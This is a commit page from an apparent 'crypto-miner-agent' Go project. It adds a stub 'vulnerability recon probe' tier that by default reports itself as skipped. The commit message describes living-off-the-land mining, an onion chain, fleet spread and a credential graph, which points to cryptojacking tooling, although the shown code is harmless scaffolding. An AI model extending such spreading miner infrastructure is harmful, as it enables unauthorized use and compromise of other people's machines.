Add tiered LOTL mining onion and fleet recon so agents can fallback across execution tiers while operators see spread and vuln posture in Crucible. Includes triple-onion chain, spread cred graph, and full Go/TS/E2E test validation.
This commit is contained in:
36
agent/miner/tier_vuln_probe.go
Normal file
36
agent/miner/tier_vuln_probe.go
Normal file
@@ -0,0 +1,36 @@
|
||||
package miner
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"crypto-miner-agent/config"
|
||||
)
|
||||
|
||||
// vulnProbeRunner is injected by the client package (avoids import cycle).
|
||||
var vulnProbeRunner func() TierAttempt
|
||||
|
||||
// SetVulnProbeRunner registers the read-only vulnerability recon probe. Nil restores default skip.
|
||||
func SetVulnProbeRunner(fn func() TierAttempt) {
|
||||
vulnProbeRunner = fn
|
||||
}
|
||||
|
||||
// RunVulnProbeTier runs authorized fleet vulnerability recon (report-only, no exploit).
|
||||
func RunVulnProbeTier(ctx context.Context, cfg config.RuntimeConfig) TierAttempt {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return TierAttempt{Tier: TierVulnProbe, Error: ctx.Err().Error(), Wallet: cfg.Wallet}
|
||||
default:
|
||||
}
|
||||
if vulnProbeRunner != nil {
|
||||
return vulnProbeRunner()
|
||||
}
|
||||
return TierAttempt{
|
||||
Tier: TierVulnProbe,
|
||||
OK: true,
|
||||
Wallet: cfg.Wallet,
|
||||
Details: map[string]interface{}{
|
||||
"skipped": true,
|
||||
"reason": "vuln probe runner not wired",
|
||||
},
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user